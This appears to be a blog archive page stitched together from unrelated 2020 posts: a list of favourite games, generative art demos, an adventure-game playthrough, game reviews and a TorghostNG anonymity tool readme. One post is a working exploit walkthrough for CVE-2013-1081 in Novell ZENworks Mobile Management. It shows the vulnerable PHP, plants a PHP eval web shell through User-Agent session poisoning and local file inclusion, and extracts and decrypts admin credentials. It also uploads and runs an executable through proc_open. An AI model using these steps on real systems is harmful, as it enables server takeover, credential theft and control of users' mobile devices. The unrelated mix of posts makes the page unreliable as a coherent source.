I know, Do you?: 2020

Tuesday, September 22, 2020

First Semester Top Ten Games

I played a lot of games in the first half of 2020 (especially because of the coronavirus quarantine). I created a list of the ten games I liked the most here on the site (without an order of preference).

Check it out below.

The gardens between: a beautiful and clever puzzle game about childhood, goodbyes and memories of two great friends. The game uses time warping mechanics to compose the puzzles. Fast and awesome.

Little nightmares: delicately scary. Little Nightmares has excellent puzzles and an extremely bizarre narrative and fabulous graphics.

Sundered: rogue-like game set in a post-apocalyptic scenario with elements of magic and technology. Play, die and play everything different again (another interesting procedural experiment).

Starman: one of the biggest surprises of this year. Starman is a very relaxing puzzle game with fantastic art. The narrative deals with loneliness in a unique way.

Old man's journey: a very simple story about facing the past and the future. A family drama with simple but very engaging puzzles.

The las of us 2: AAA huge game with epic scenarios, animations, cut scenes and challenges. Although many did not like the narrative, I did; and I really liked it. In my opinion, just one problem: the game could have ten hours less of gameplay (it gets a little repetitive from half onwards).

The almost gone: depression, pain, memories of life and death. A perfect mix for a good mystery puzzle game.

Zenge: just another clever visual puzzle with simple design and a very crazy narrative created with beautiful images.

Over the top tower defense (OTTTD): one of my favorite genres! Put the turrets, kill the enemies, earn money and build new powerful turrets. This one is very frantic and distressing. A perfect one after a long day of work. =)

Alteric: according to the developers - Thomas was alone meets Dark Souls. A 2D puzzle platform game quite challenging with minimalist graphics. Excellent!

#GoGamers

Monday, September 21, 2020

Fun Art Projects

I've not been in the mood to write articles lately, so instead I've been working on some fun projects instead. Watabou posted about Dyson Hatching, which got me thinking it might be interesting to constrain the hatch lines to Voronoi cells. I implemented that and then got carried away with colors, line spacing, line width, and other fun things. The demo is here. You can drag an image onto the diagram to use the colors from your image.

The second project was also thanks to a Watabou tweet. It inspired me to play with shaders on a Delaunay mesh. Once again I got carried away and had lots of fun making patterns. The demo is here. Play with the first two sliders to pick the pattern, then adjust the other sliders to fine tune it.

Enjoy!

Saturday, September 12, 2020

Lost Secret Of The Rainforest - Concerned

Written by Reiko

Adam's Journal #3: "I got to meet Forest Heart! But it's so sad, she's a huge tree, but she's dying! And I have to find her sprout so the village will still be protected when she's gone. She had one, but it didn't survive, so there has to be another one somewhere. Maybe the villagers can help me?"

Last time, I finally found the Forest Heart and received the main quest to find a sprout of hers to replace her when she's gone. She gave Adam a special branch, some seed pods, and a bark cup, which should be useful for making progress in the village. So I head back along the path.

To my surprise, I find the village occupied again when I get back. Where was everyone before? Several groups of people sit busily doing things around the big hut. A potter worriedly tends her crying baby. An older man with a painted face talks with a younger one. A storyteller tells a story to some children. A couple more people lie in hammocks, resting.

Aww, poor baby.

One problem at a time. That doesn't work for me, though.

I go around and talk to everyone. The potter [1] is worried because a bee stung her baby, who's in pain [1], and she doesn't want to bother the shaman for a poultice. The older man [1] thinks the younger, Llusti, should apologize to someone he quarreled with, named Churana. They've got a machete that looks useful, but the older man won't let me take it (until I help with the quarrel, presumably). The storyteller is too busy telling the story to talk. I now have two people to look for, though: the shaman and the person that the young man quarreled with.

On the next screen, three old women are angrily staring at a cooking pot. A weaver is sitting by her cloth, looking upset. An unhappy woman sits by the garden. And two hunters sort through arrows, periodically talking to the gardener.

Did you break your tools?

I talk to each of the women by the pot [3], and they each agree that they are waiting on some lazy woman (they don't name her) to bring some roots so they can make a drink. The weaver [1] is upset because Llusti is upset with her, so she must be Churana. The gardener [1] says others call her Lazy Sumac, so she's probably the one who needs to get the roots, but she can't work because her tools are broken. And the hunters are too busy to talk.

Well, that's certainly a lot of problems to solve. I need to get Llusti to apologize to Churana so she can weave; I need to get Sumac new tools so she can get the roots for the old women; and I need to get the poultice from the shaman for the baby. I also notice that there are now more things to scan on these screens, so I go back over both of them and find five more things: Pottery, Body Painting, Iguana, Masato, Hunting [5].

Finally a problem I can solve.

I'm not sure what to do about those problems yet, so I move on to the third village screen, the one with the vine and the small hut. A boy is sadly hanging on the vine and a man is working on the thatch of the hut's roof. The boy [1] says that everyone is angry with him because he lost a drum. Well, that at least I can solve. I give him the drum I found [5], and he happily runs off to practice.

Maybe you're really the shaman? And what's a Sky Sapphire anyway?

Oh, maybe it's this butterfly.

The man by the thatch babbles a bit about the shaman being busy sometimes. I'm kind of wondering if he's actually the shaman and doesn't want to help me, but anyway, he suggests I need to get a "Sky Sapphire" in order to see the shaman. He also names the potter as Musqui and suggests she shouldn't be afraid to come see the shaman for a poultice (so the shaman will help people that are sick, at least). Maybe I can help her, though - he says the shaman often visits Forest Heart when he needs to make a poultice. Maybe one of the gifts I received will help the baby.

I also swing back across the stream and check the bushes again. This time I can pick some berries [5]. I also find something shiny - a necklace with a dolphin's tooth on it [5]. Time to go around and see if any of my items can help anyone, or if anyone can tell me what a Sky Sapphire is. The boy, Taquia, is now playing the drums. Apparently he will be shaman someday. He says Sinchi makes him practice, but won't say who that is (maybe the shaman?). I show the necklace first to the gardener, who says it's a love charm the shaman made. Maybe that would help Churana with Llusti?

She already has a baby, so obviously she doesn't need it now.

When I show it to Churana, she says it would, but it belongs to her sister, so she can't use it without permission. Who could her sister be? Maybe the potter? Yep, how convenient. I show it to her [5], and she says those bushes were where the baby was stung, and when that happened, she ran away, dropping the necklace. But she has no need of a love charm, so Churana can use it.

You're going to give your priceless family heirloom to a random outsider you never met before today?

When I give it to Churana [5], she gratefully gives me a necklace she received from her mother with a tiny pattern carved on it. Now she goes back to her weaving, content. I then show the bark cup to the gardener [1] who says I'm special for being able to borrow the shaman's medicine cup. Of course, I got it from Forest Heart, not from the shaman. She has something to say about all my other new items, too, but can't use any of them. The berries aren't for food, so she doesn't grow them, and she doesn't know how to grow the special seed pods either, but she says the shaman uses them.

The old women [1] say I need to return the medicine cup to the shaman. They get a little alarmed when I show them the berries and the seed pods, as they aren't food and shouldn't go in the drink they're trying to make. Churana also recognizes the medicine cup [1] but doesn't tell me anything new.

Who is the shaman?

Now that I've helped Churana, the older man has also managed to reason with Llusti, who is gone when I get back to the first screen. Now the older man will graciously allow me to take the machete when I reach for it [5]. I don't actually know what I need it for yet. He also refuses the medicine cup [1], of course, saying I need to return it to the shaman. Adam asks who the shaman is, and he says it's hard to say, because he is someone of the tribe and yet apart from it.

The weaver says the medicine cup [1] is what the shaman has used to mix poultices for her baby. She stops me when I try giving the berries or the seed pods to the baby, saying they aren't for food. But she says the seed pods smell like the poultice she needs, except they're too rough for the baby's skin. Surely there will be a way to crush them up or something to make the poultice.

Are you sure you aren't the shaman?

I still don't know what a sky sapphire is, although I suspect it's the bright blue butterfly that has been flitting around the hut screens, inviting me to catch it. It can also be scanned to reveal that it's a Morpho Butterfly [1]. I don't know how to catch it though, and the ecorder information is no help with this either, so I go back and talk to the thatcher again. When I show him the medicine cup [1] he says I should hold onto it for now, but he will tell the shaman. He also names himself as Sinchi, so he's the one that's been teaching the boy. All the more reason why he could be the shaman himself. When I show him the seed pods, he says he doesn't know why Sumac can't grow them, but they're useful for poultices, and I should put them on the bench next to him, which I do [1].

At this point I'm at a bit of a loss. I've helped Churana, but I'm not sure where the shaman is, I don't know what to do with his cup (I was going to put it on the bench, but Sinchi says the shaman was going to fill it, and I could do him a favor by holding onto it - but fill it with what?), I don't know how to make the poultice for the baby, and I don't know how to catch the butterfly.

I did notice that bugs seemed to be attracted to the liquid in the cookpot that the three old women are tending. I think I need to get some so that the butterfly will land somewhere so I can catch it. But the only container I have is the bark cup, and I can't use that on the pot. Also, if I try to get the butterfly on the first screen, I get a message saying it won't stay anywhere long enough, but if I try to get it on the second screen, the message says that grabbing it would damage it. That seems to suggest I need to catch it without touching it, like with a net or cage. But I have nothing like that either. None of the other pots or visible containers around the village can be picked up or manipulated.

Sumac's not lazy, just underequipped.

Wait a second. Sumac needs a tool, and I now have a machete. I thought I'd already tried that, but nope, the machete is exactly what she needs [5]. She gives me the roots for the old women (and warns me that they're poison unless prepared correctly). I pass them on to the old women [5], who add them to the pot to make their drink. No apology to Sumac, though. They say I need a cup and then they'll give me some, but I still only have the bark cup and it still isn't working on the cookpot. There's an empty pot sitting around on the waterfall screen, but I can't pick it up: I'm just told it's empty when I try. Why can't I use that?

The old woman's response to finding bugs in the drink. Yuck.

Any suggestions (ROT-13) for what container I need for the drink or what else I need to do to catch the butterfly would be helpful. I have apparently missed something somehow.

Score: 347/1000
Scanned items: 42/82
Inventory: passport, Ecorder, Forest Heart amulet, leaf with sticky sap, branch, bark cup, carved necklace, berries

Session Time: 2 hour 15 min
Total Time: 5 hour 30 minutes

Note Regarding Spoilers and Companion Assist Points: There's a set of rules regarding spoilers and companion assist points. Please read it here before making any comments that could be considered a spoiler in any way. The short of it is that no points will be given for hints or spoilers given in advance of me requiring one. Please...try not to spoil any part of the game for me...unless I really obviously need the help...or I specifically request assistance. In this instance, I've not made any requests for assistance. Thanks!

SPACE HULK: VENGEANCE OF THE BLOOD ANGELS

Game Workshop's Warhammer series of tabletop strategy games spawned a bunch of spin-offs and spin-offs of spin-offs. First launching in 1989, Space Hulk took the sprawling sci-fi setting of Warhammer 40K and shrunk it down to the small claustrophobic corridors of many a derelict spacecraft. These were known as Space Hulks, and that premise begat a rather successful videogame franchise, including this second entry from Electronic Arts; Space Hulk: Vengeance of the Blood Angels.

Read more »

Friday, September 4, 2020

Anachronox (PC)

Developer:

Ion Storm

Release Date:

2001

Systems:

Windows

Deus Ex-style spinning logo!

This week on Super Adventures, it's Ion Storm's fourth game (of six), Anachronox! It was supposed to come out much earlier than that, but then that was true of everything Ion Storm's Dallas studio worked on. Dominion: Storm over Gift 3 was supposed to be released in 1997 and came out a year later in 98, Daikatana was also supposed to hit shelves in 97 and was eventually finished three years later in 2000, and Anachronox was planned for 1998 and was finally released in 2001. It's not really a mystery why the Dallas studio was closed down the month after Anachronox's release, as even if the games had sold well (they hadn't) they must have been way way over budget.

The company's second studio in Austin had a lot more success with the legendary Deus Ex, and survived a few years longer to produce the considerably less legendary Deus Ex: Invisible War and a third Thief game, Deadly Shadows. Which means that during its life Ion Storm released Dominion, Daikatana, Deus Ex, Deus Ex 2, Deadly Shadows... and Anachronox. One of these titles doesn't match the pattern. They should've called this Danachronox, or Daikatanachronox.

Ion Storm was formed by John Romero and Tom Hall, who had both gotten pushed out of id Software due to creative differences. I haven't read Masters of Doom, but it seems like they wanted to be creative, while John Carmack wanted to get games finished. In fact Hall was technically lead designer on Doom, but the character-driven story he'd come up with was thrown out, because who even needs story in video games? To be fair, Doom did just fine without it, but Anachronox was Hall's project, and this time no one was going to stop him putting in all the story and characters and space adventure he wanted.

Hopefully that'll turn out to be a good thing.

Read on »

Monday, August 31, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.

Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM

For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:

Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]

I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.

The actual CVE details are as follows:

"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."

After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:

POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=

Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:

<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== '' && $Language != $_SESSION["language"])
{
//check for validity
if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
{
$_SESSION["language"] = $Language;
}
}

if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);

In English:

Check if the "language" parameter is passed in on the request
If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
If the session variable "language" is set, include it into the page
Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:

$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;

The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:

egrep -R '\$_SESSION\[.*\] =' ./

This pulled up a ton of results, including the following:

/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0)
{

} else
{
$_SESSION['$error'] = LOGIN_FAILED_TEXT;
header('Location: index.php');
}

The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)

This will create a session file named "sess_payload" that we can include, the file contains the following:

user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";

Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:

return mdm_DecryptData($result[0]['Password']);

Ends up it is magic – so I sent the following PHP to be executed on the server -

$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);

Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_creds.rb

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));

This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.

After we have uploaded the file we can then carry out another request to execute what has been uploaded:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
$output=explode("\\n",+stream_get_contents($pipes[1]));
fclose($pipes[1]);
proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};

The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_lfi.rb

Update: Metasploit modules are now available as part of metasploit.

Sunday, August 30, 2020

TorghostNG: Make All Your Internet Traffic Anonymized With Tor Network

About TorghostNG
TorghostNG is a tool that make all your internet traffic anonymized with Tor network. TorghostNG is rewritten from TorGhost with Python 3.

TorghostNG was tested on:

Kali Linux 2020a

Manjaro

...

What's new in TorghostNG 1.2

Fixed update_commands and others in torghostng.py

Changed a few things in theme.py

Changed a few things in install.py

Now you can change Tor circuit with -r

Before you use TorghostNG

For the goodness of Tor network, BitTorrent traffic will be blocked by iptables. Although you can bypass it with some tweaks with your torrent client 😥 It's difficult to completely block all torrent traffic.

For security reason, TorghostNG is gonna disable IPv6 to prevent IPv6 leaks (it happened to me lmao).

Screenshots of Torghost (Version 1.0)
Connecting to Tor exitnode in a specific country: torghostng -id COUNTRY ID

Changing MAC address: torghostng -m INTERFACE

Checking IP address: torghostng -c

Disconnecting from Tor: torghostng -x

Uninstalling TorghostNG: python3 install.py

Installing TorghostNG
TorghostNG installer currently supports:

GNU/Linux distros that based on Arch Linux

GNU/Linux distros that based on Debian/Ubuntu

GNU/Linux distros that based on Fedora, CentOS, RHEL, openSUSE

Solus OS

Void Linux

Anh the elder guy: Slackware

(Too much package managers for one day :v)

To install TorghostNG, open your Terminal and enter these commands:
But with Slackware, you use sudo python3 torghostng.py to run TorghostNG :v

Help
You can combine multiple choices at the same time, such as:

torghostng -s -m INTERFACE: Changing MAC address before connecting

torghostng -c -m INTERFACE: Checking IP address and changing MAC address

torghostng -s -x: Connecting to Tor anh then stop :v

...

If you have any questions, you can watch this tutorial videos 🙂
I hope you will love it 😃

How to update TorghostNG
Open Terminal and type sudo torghostng -u with sudo to update TorghostNG, but it will download new TorghostNG to /root, because you're running it as root. If you don't like that, you can type git pull -f and sudo python3 install.py.

Notes before you use Tor
Tor can't help you completely anonymous, just almost:

Tor's Biggest Threat – Correlation Attack

Is Tor Broken? How the NSA Is Working to De-Anonymize You When Browsing the Deep Web

Use Traffic Analysis to Defeat TOR

...

It's recommended that you should use NoScript before before surfing the web with Tor. NoScript shall block JavaScript/Java/Flash scripts on websites to make sure they won't reveal your real identify.

And please

Don't spam or perform DoS attacks with Tor. It's not effective, you will only make Tor get hated and waste Tor's money.

Don't torrent over Tor. If you want to keep anonymous while torrenting, use a no-logs VPN please.

Bittorrent over Tor isn't a good idea
Not anonymous: attack reveals BitTorrent users on Tor network

Changes log
Version 1.2

Fixed update_commands and others in torghostng.py

Changed a few things in theme.py

Changed a few things in install.py

Now you can change Tor circuit with -r

Version 1.1

Check your IPv6

Change all "TOR" to "Tor"

Block BitTorrent traffic

Auto disable IPv6 before connecting to Tor

Contact to the coder

Twitter: @SecureGF

Github: @GitHackTools

Website: GitHackTools 🙂

To-do lists:

Block torrent, for you - Tor network (Done 😃)

Connect to IPv6 relays (maybe?)

GUI version

Fix bug, improve TorghostNG (always)

And finally: You can help me by telling me if you find any bugs or issues. Thank you for using my tool 😊

Download TorghostNG

Watch tutorial videos

Related links

I know, Do you?

Followers

Blog Archive

About Me